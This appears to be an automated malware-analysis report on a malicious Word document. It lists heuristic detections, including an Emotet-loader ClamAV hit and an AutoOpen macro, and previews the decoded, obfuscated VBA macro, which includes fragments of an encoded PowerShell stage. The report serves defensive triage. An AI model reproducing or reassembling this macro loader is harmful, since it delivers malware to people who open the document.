MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious OLE document containing a VBA macro. The 'AutoOpen' macro, a common auto-execution entry point, is present and utilizes 'CreateObject' to execute obfuscated code. This strongly suggests the macro's purpose is to download and execute a secondary payload, a common technique for malware delivery. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40974 bytes |
SHA-256: 95219e1e95ae73e4794a503e7e04a2df466b78fc2238b0a01212bec9d1dd4b0b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 19 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NClwQGowV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QQfdjilYci"
Function IUuaarQpLJOiiB()
On Error Resume Next
Select Case jKQmvf
Case 51809
Rzhzd = Hex(26125 - CSng(6443) - 84068 + ChrW(NzGvo))
WtBsm = mmjdz
End Select
CfncLFz = PXFdF("4UfcIAMwBkADEAMgA1ADAAZQAyAGEAMQA1ADgANQA3ADMAMAAyAGUANgBkADcAZABjAGIANwBiADUAYwBhADgANwA3ADEAMQAXjH0", 5, 93)
Select Case wNhHZ
Case 70984
JwuNzo = Hex(33023 - CSng(85671) - 26729 + ChrW(ZBjrou))
tmoOiN = VdAHd
End Select
Select Case ZWEdXY
Case 21648
wGIJEh = Hex(97026 - CSng(26391) - 15084 + ChrW(NZlaHT))
CLanw = XIKWV
End Select
VhYvzzNiPzK = PXFdF("I,8BA2ADYAZQBkADYANAAxAGIAZQA1ADAAYQBlADkAYQAxADgAMQA2ADYANQBlADgAZAA3AGYANwA0ADMANwBmADcAOAA2AGMAZAA5AGUAYgA4AGQANQBlAGMANYjK", 5, 119)
Select Case uMbijp
Case 53454
BuMzt = Hex(76280 - CSng(96312) - 89685 + ChrW(OzPlW))
MkLAi = BtLcfM
End Select
Select Case IXXHjB
Case 68930
zkMnC = Hex(27180 - CSng(2370) - 58214 + ChrW(hlYhSw))
LDQGjF = owNiz
End Select
XPXniGOHEa = PXFdF("J5rBAZABkAGIAZgA0ADIANAA5AGEAMAAzAGUAMQBlADEAYgBlAGIAZgBjADMAIuXnq", 5, 57)
Select Case hFWQW
Case 92161
iRFjC = Hex(5457 - CSng(95068) - 47282 + ChrW(sCpbqv))
kdYtjY = pjDTFc
End Select
Select Case kvhLGR
Case 24919
mkFRlY = Hex(90909 - CSng(80404) - 28586 + ChrW(wFojwW))
uUYhT = YsPiF
End Select
fGWazpVWjr = PXFdF("5wNwAyADIAMAAwADcAMgA1ADMAZQBjADcAYgAwADYAOQA3ADEAYgBiADQANABiADUAZABjAGIAMgAyAGIAMwBlADIAYgBlADcANgA0ADIAYQAyADMAZgA4AGQAO5Tpj", 3, 121)
Select Case JGDOLh
Case 93351
lLrlvE = Hex(78444 - CSng(45764) - 67249 + ChrW(DzLpLw))
ESYjZW = qtFYur
End Select
Select Case pYoLW
Case 29885
opNuOn = Hex(81443 - CSng(51260) - 90942 + ChrW(QSfhp))
jouIz = lVnVLz
End Select
dXDFLIz = PXFdF("5dEPJ,114,186,28,235,81,71,74,70,203,169,62,37)) ) )| & ( $SHEllId[1]+$4p", 6, 66)
Select Case hYIjcF
Case 75080
pBThrJ = Hex(8648 - CSng(93713) - 4370 + ChrW(kzOFXb))
wtEsG = bsiOzI
End Select
Select Case MROBr
Case 90466
JLNNG = Hex(86670 - CSng(55108) - 72053 + ChrW(FQtuR))
kCDhrG = iuKoK
End Select
LXWuLMI = PXFdF("busHNADYANwBkADcAYQAzAGYAYQA1AGMAZgAzADcAYwBmAGMAZAA4AGIAZQAzAGYAMwA1AGEAMABkAGQANwAkd", 6, 79)
Select Case ivdrr
Case 85759
OWFzZZ = Hex(22623 - CSng(30278) - 21717 + ChrW(DrnOh))
zJDwo = TCSiUH
End Select
Select Case TojBqK
Case 39895
GKjcu = Hex(77996 - CSng(72535) - 955 + ChrW(iKiKUP))
YNncDq = qOhCI
End Select
RCREIfTU = PXFdF("pgA1AGQAZQA2ADYA' | cOnVerTtO-SECurEstRINg -K 107,78,130,13,65,226,162,247,35,243,236,251jjJu,3q2", 2, 89)
Select Case LQhjv
Case 78499
kkwGz = Hex(71717 - CSng(35294) - 49629 + ChrW(iSzZv))
dWsKQz = NMmdpb
End Select
Select Case UXsjKl
Case 78708
jaVwiN = Hex(49472 - CSng(49344) - 26356 + ChrW(sVfdIV))
fJlmC = HzDzml
End Select
DBLiOH = PXFdF("j13UDUAYgBiADAAYQA5ADgANABlADkAMAA0ADcANAA1ADEAR8FU", 5, 43)
Select Case STdvch
Case 1921
AmWlUI = Hex(50598 - CSng(47781) - 90890 + ChrW(PXUfcD))
hlNAaP = onfYsj
End Select
Select Case nlkwv
Case 81817
FHNTW = Hex(983 - CSng(71641) - 37716 + ChrW(ZlIVv))
FJuwBz = VthPRD
End Select
KuHPU = PXFdF("dP([rUnTime.intEroPSErvicES.marShAl]::([RunTIME.iNTERopSerVICes.marSHal].gETMeMBeRs()[4].nAME).inVOke([RuNTiMe.iNTEropsERVICEs.mARShal]::sEcuReStrINgTo5.b5f", 3, 149)
Select Case inJpaq
Case 94796
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.